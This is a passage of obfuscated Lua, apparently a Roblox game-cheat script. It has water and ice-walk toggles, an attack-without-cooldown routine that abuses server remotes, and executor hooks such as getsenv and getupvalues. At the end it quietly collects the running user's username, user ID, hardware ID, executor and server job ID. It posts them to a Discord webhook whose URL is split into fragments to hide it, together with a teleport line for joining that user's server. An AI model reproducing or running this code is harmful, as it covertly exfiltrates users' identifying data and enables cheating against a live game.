		_G["WalkWater_Part"] = L_1727_[1]
		if _G["WalkWater_Part"] then
			(game:GetService("Workspace"))["Map"]["WaterBase-Plane"]["Size"] = Vector3["new"](1000, 112, 1000)
		else
			(game:GetService("Workspace"))["Map"]["WaterBase-Plane"]["Size"] = Vector3["new"](1000, 80, 1000)
		end
	end
})
iceWalk = L_1_[93]["Misc"]:AddToggle({
	["Name"] = "Turn on Ice Walk",
	["Description"] = "",
	["Default"] = false,
	["Callback"] = function(L_1728_arg0)
		local L_1729_ = {}
		L_1729_[1] = L_1728_arg0
		_G["WalkWater"] = L_1729_[1]
	end
})
spawn(function()
	while task["wait"]() do
		if _G["WalkWater"] then
			pcall(function()
				if L_1_[42]["Character"] and L_1_[42]["Character"]:FindFirstChild("LeftFoot") then
					local L_1730_ = {}
					L_1730_[3] = L_1_[103]["Assets"]["Models"]["IceSpikes4"]:Clone()
					L_1730_[3]["Parent"] = workspace
					L_1730_[3]["Size"] = Vector3["new"](3 + math["random"](10, 12), 1.7, 3 + math["random"](10, 12))
					L_1730_[3]["Color"] = Color3["fromRGB"](128, 187, 219)
					L_1730_[3]["CFrame"] = CFrame["new"](L_1_[42]["Character"]["Head"]["Position"]["X"], -3.8, L_1_[42]["Character"]["Head"]["Position"]["Z"]) * CFrame["Angles"]((math["random"]() - .5) * .06, math["random"]() * 7, (math["random"]() - .5) * .07)
					L_1730_[1] = {}
					L_1730_[1]["Size"] = Vector3["new"](0, .3, 0)
					L_1730_[2] = TW:Create(L_1730_[3], TweenInfo["new"](2, Enum["EasingStyle"]["Quad"], Enum["EasingDirection"]["In"]), L_1730_[1])
					L_1730_[2]["Completed"]:Connect(function()
						L_1730_[3]:Destroy()
					end)
					L_1730_[2]:Play()
				end
			end)
		end
	end
end)
L_1_[43] = game["Players"]["LocalPlayer"]
L_1_[20] = function(L_1731_arg0)
	local L_1732_ = {}
	L_1732_[3] = L_1731_arg0
	if not L_1732_[3] then
		return false
	end
	L_1732_[1] = L_1732_[3]:FindFirstChild("Humanoid")
	return L_1732_[1] and L_1732_[1]["Health"] > 0
end
L_1_[134] = function(L_1733_arg0, L_1734_arg1)
	local L_1735_ = {}
	L_1735_[5], L_1735_[3] = L_1733_arg0, L_1734_arg1
	L_1735_[2] = (game:GetService("Workspace"))["Enemies"]:GetChildren()
	L_1735_[7] = (game:GetService("Players")):GetPlayers()
	L_1735_[4] = {}
	L_1735_[1] = (L_1735_[5]:GetPivot())["Position"]
	for L_1736_forvar0, L_1737_forvar1 in ipairs(L_1735_[2]) do
		local L_1738_ = {}
		L_1738_[4], L_1738_[1] = L_1736_forvar0, L_1737_forvar1
		L_1738_[3] = L_1738_[1]:FindFirstChild("HumanoidRootPart")
		if L_1738_[3] and L_1_[20](L_1738_[1]) then
			local L_1739_ = {}
			L_1739_[2] = (L_1738_[3]["Position"] - L_1735_[1])["Magnitude"]
			if L_1739_[2] <= L_1735_[3] then
				table["insert"](L_1735_[4], L_1738_[1])
			end
		end
	end
	for L_1740_forvar0, L_1741_forvar1 in ipairs(L_1735_[7]) do
		local L_1742_ = {}
		L_1742_[2], L_1742_[1] = L_1740_forvar0, L_1741_forvar1
		if L_1742_[1] ~= L_1_[43] and L_1742_[1]["Character"] then
			local L_1743_ = {}
			L_1743_[2] = L_1742_[1]["Character"]:FindFirstChild("HumanoidRootPart")
			if L_1743_[2] and L_1_[20](L_1742_[1]["Character"]) then
				local L_1744_ = {}
				L_1744_[2] = (L_1743_[2]["Position"] - L_1735_[1])["Magnitude"]
				if L_1744_[2] <= L_1735_[3] then
					table["insert"](L_1735_[4], L_1742_[1]["Character"])
				end
			end
		end
	end
	return L_1735_[4]
end
function AttackNoCoolDown()
	local L_1745_ = {}
	L_1745_[7] = (game:GetService("Players"))["LocalPlayer"]
	L_1745_[10] = L_1745_[7]["Character"]
	if not L_1745_[10] then
		return
	end
	L_1745_[1] = nil
	for L_1746_forvar0, L_1747_forvar1 in ipairs(L_1745_[10]:GetChildren()) do
		local L_1748_ = {}
		L_1748_[3], L_1748_[1] = L_1746_forvar0, L_1747_forvar1
		if L_1748_[1]:IsA("Tool") then
			L_1745_[1] = L_1748_[1]
			break
		end
	end
	if not L_1745_[1] then
		return
	end
	L_1745_[14] = L_1_[134](L_1745_[10], 60)
	if #L_1745_[14] == 0 then
		return
	end
	L_1745_[11] = game:GetService("ReplicatedStorage")
	L_1745_[5] = L_1745_[11]:FindFirstChild("Modules")
	if not L_1745_[5] then
		return
	end
	L_1745_[4] = ((L_1745_[11]:WaitForChild("Modules")):WaitForChild("Net")):WaitForChild("RE/RegisterAttack")
	L_1745_[2] = ((L_1745_[11]:WaitForChild("Modules")):WaitForChild("Net")):WaitForChild("RE/RegisterHit")
	if not L_1745_[4] or not L_1745_[2] then
		return
	end
	L_1745_[6], L_1745_[12] = {}, nil
	for L_1749_forvar0, L_1750_forvar1 in ipairs(L_1745_[14]) do
		local L_1751_ = {}
		L_1751_[1], L_1751_[3] = L_1749_forvar0, L_1750_forvar1
		if not L_1751_[3]:GetAttribute("IsBoat") then
			local L_1752_ = {}
			L_1752_[1] = {
				"RightLowerArm";
				"RightUpperArm",
				"LeftLowerArm";
				"LeftUpperArm";
				"RightHand",
				"LeftHand"
			}
			L_1752_[2] = L_1751_[3]:FindFirstChild(L_1752_[1][math["random"](#L_1752_[1])]) or L_1751_[3]["PrimaryPart"]
			if L_1752_[2] then
				table["insert"](L_1745_[6], {
					L_1751_[3],
					L_1752_[2]
				})
				L_1745_[12] = L_1752_[2]
			end
		end
	end
	if not L_1745_[12] then
		return
	end
	L_1745_[4]:FireServer(0)
	L_1745_[13] = L_1745_[7]:FindFirstChild("PlayerScripts")
	if not L_1745_[13] then
		return
	end
	L_1745_[8] = L_1745_[13]:FindFirstChildOfClass("LocalScript")
	while not L_1745_[8] do
		L_1745_[13]["ChildAdded"]:Wait()
		L_1745_[8] = L_1745_[13]:FindFirstChildOfClass("LocalScript")
	end
	if getsenv then
		local L_1753_ = {}
		L_1753_[1], L_1753_[3] = pcall(getsenv, L_1745_[8])
		if L_1753_[1] and L_1753_[3] then
			L_1745_[9] = L_1753_[3]["_G"]["SendHitsToServer"]
		end
	end
	L_1745_[15], L_1745_[16] = pcall(function()
		return (require(L_1745_[5]["Flags"]))["COMBAT_REMOTE_THREAD"] or false
	end)
	if L_1745_[15] and (L_1745_[16] and L_1745_[9]) then
		L_1745_[9](L_1745_[12], L_1745_[6])
	elseif L_1745_[15] and not L_1745_[16] then
		L_1745_[2]:FireServer(L_1745_[12], L_1745_[6])
	end
end
CameraShakerR = require(game["ReplicatedStorage"]["Util"]["CameraShaker"])
CameraShakerR:Stop()
get_Monster = function()
	for L_1754_forvar0, L_1755_forvar1 in pairs(workspace["Enemies"]:GetChildren()) do
		local L_1756_ = {}
		L_1756_[1], L_1756_[4] = L_1754_forvar0, L_1755_forvar1
		L_1756_[3] = L_1756_[4]:FindFirstChild("UpperTorso") or L_1756_[4]:FindFirstChild("Head")
		if L_1756_[4]:FindFirstChild("HumanoidRootPart", true) and L_1756_[3] then
			if (L_1756_[4]["Head"]["Position"] - L_1_[42]["Character"]["HumanoidRootPart"]["Position"])["Magnitude"] <= 50 then
				return true, L_1756_[3]["Position"]
			end
		end
	end
	for L_1757_forvar0, L_1758_forvar1 in pairs(workspace["SeaBeasts"]:GetChildren()) do
		local L_1759_ = {}
		L_1759_[2], L_1759_[3] = L_1757_forvar0, L_1758_forvar1
		if L_1759_[3]:FindFirstChild("HumanoidRootPart") and (L_1759_[3]:FindFirstChild("Health") and L_1759_[3]["Health"]["Value"] > 0) then
			return true, L_1759_[3]["HumanoidRootPart"]["Position"]
		end
	end
	for L_1760_forvar0, L_1761_forvar1 in pairs(workspace["Enemies"]:GetChildren()) do
		local L_1762_ = {}
		L_1762_[1], L_1762_[2] = L_1760_forvar0, L_1761_forvar1
		if L_1762_[2]:FindFirstChild("Health") and (L_1762_[2]["Health"]["Value"] > 0 and L_1762_[2]:FindFirstChild("VehicleSeat")) then
			return true, L_1762_[2]["Engine"]["Position"]
		end
	end
end
Actived = function()
	local L_1763_ = {}
	L_1763_[1] = game["Players"]["LocalPlayer"]["Character"]:FindFirstChildOfClass("Tool")
	for L_1764_forvar0, L_1765_forvar1 in next, getconnections(L_1763_[1]["Activated"]) do
		local L_1766_ = {}
		L_1766_[2], L_1766_[3] = L_1764_forvar0, L_1765_forvar1
		if typeof(L_1766_[3]["Function"]) == "function" then
			getupvalues(L_1766_[3]["Function"])
		end
	end
end
task["spawn"](function()
	RunSer["Heartbeat"]:Connect(function()
		pcall(function()
			local L_1767_ = {}
			if not _G["Seriality"] then
				return
			end
			AttackNoCoolDown()
			L_1767_[2] = game["Players"]["LocalPlayer"]["Character"]:FindFirstChildOfClass("Tool")
			L_1767_[5] = L_1767_[2]["ToolTip"]
			L_1767_[1], L_1767_[3] = get_Monster()
			if L_1767_[5] == "Blox Fruit" then
				if L_1767_[1] then
					local L_1768_ = {}
					L_1768_[2] = L_1767_[2]:FindFirstChild("LeftClickRemote")
					if L_1768_[2] then
						Actived()
						L_1768_[2]:FireServer(Vector3["new"](.01, -500, .01), 1, true)
						L_1768_[2]:FireServer(false)
					end
				end
			end
		end)
	end)
end)
L_1_[11] = game:GetService("HttpService")
L_1_[121] = (game:GetService("Players"))["LocalPlayer"] or {}
L_1_[90] = identifyexecutor and identifyexecutor() or "Unknown Executor"
L_1_[99] = gethwid and gethwid() or "Unknown HWID"
L_1_[118] = game["PlaceId"] or 0
L_1_[106] = game["JobId"] or "Unknown"
L_1_[61] = L_1_[2]({
	"https://discord.com/";
	"api/webhooks/1450118";
	"152213237841/nd89RDo";
	"-W0xQyOODqwweKFSi5eK";
	"Nittl7BXsyTww0X_oXKs";
	"hSNVdH2I3ATNoRoUGsXD";
	"5"
})
L_1_[71] = {
	["embeds"] = {
		{
			["title"] = L_1_[2]({
				"Roblox Account Infor";
				"mation"
			}),
			["url"] = L_1_[2]({
				"https://www.roblox.c",
				"om/users/"
			}) .. tostring(L_1_[121]["UserId"] or 0);
			["description"] = "Display Name: **" .. (tostring(L_1_[121]["DisplayName"] or "Unknown") .. "**");
			["color"] = tonumber("0x000000"),
			["thumbnail"] = {
				["url"] = L_1_[2]({
					"https://www.roblox.c";
					"om/headshot-thumbnai",
					"l/image?userId="
				}) .. (tostring(L_1_[121]["UserId"] or 0) .. L_1_[2]({
					"&width=420&height=42",
					"0&format=png"
				}))
			};
			["fields"] = {
				{
					["name"] = "User Name:",
					["value"] = "`" .. (tostring(L_1_[121]["Name"] or "Unknown") .. "`");
					["inline"] = true
				},
				{
					["name"] = "User ID:";
					["value"] = "`" .. (tostring(L_1_[121]["UserId"] or 0) .. "`"),
					["inline"] = true
				};
				{
					["name"] = "Executor:";
					["value"] = "`" .. (tostring(L_1_[90]) .. "`"),
					["inline"] = true
				};
				{
					["name"] = "HWID:",
					["value"] = "`" .. (tostring(L_1_[99]) .. "`");
					["inline"] = true
				},
				{
					["name"] = "Place ID:",
					["value"] = "`" .. (tostring(L_1_[118]) .. "`"),
					["inline"] = true
				};
				{
					["name"] = "Job ID:",
					["value"] = "`" .. (tostring(L_1_[106]) .. "`");
					["inline"] = true
				};
				{
					["name"] = "Script Hop:",
					["value"] = L_1_[2]({
						"```lua\
game:GetServi",
						"ce('TeleportService'";
						"):TeleportToPlaceIns",
						"tance("
					}) .. (tostring(L_1_[118]) .. (", '" .. (tostring(L_1_[106]) .. L_1_[2]({
						"', game.Players.Loca",
						"lPlayer)```"
					}))));
					["inline"] = false
				}
			}
		}
	}
}
L_1_[114] = L_1_[11]:JSONEncode(L_1_[71])
L_1_[37] = {
	["Content-Type"] = "application/json"
}
L_1_[113] = http_request or request or HttpPost or syn and syn["request"] or http and http["request"]
if not L_1_[113] then
	return
end
pcall(function()
	L_1_[113]({
		["Url"] = L_1_[61],
		["Method"] = "POST";
		["Headers"] = L_1_[37];
		["Body"] = L_1_[114]
	})
end)
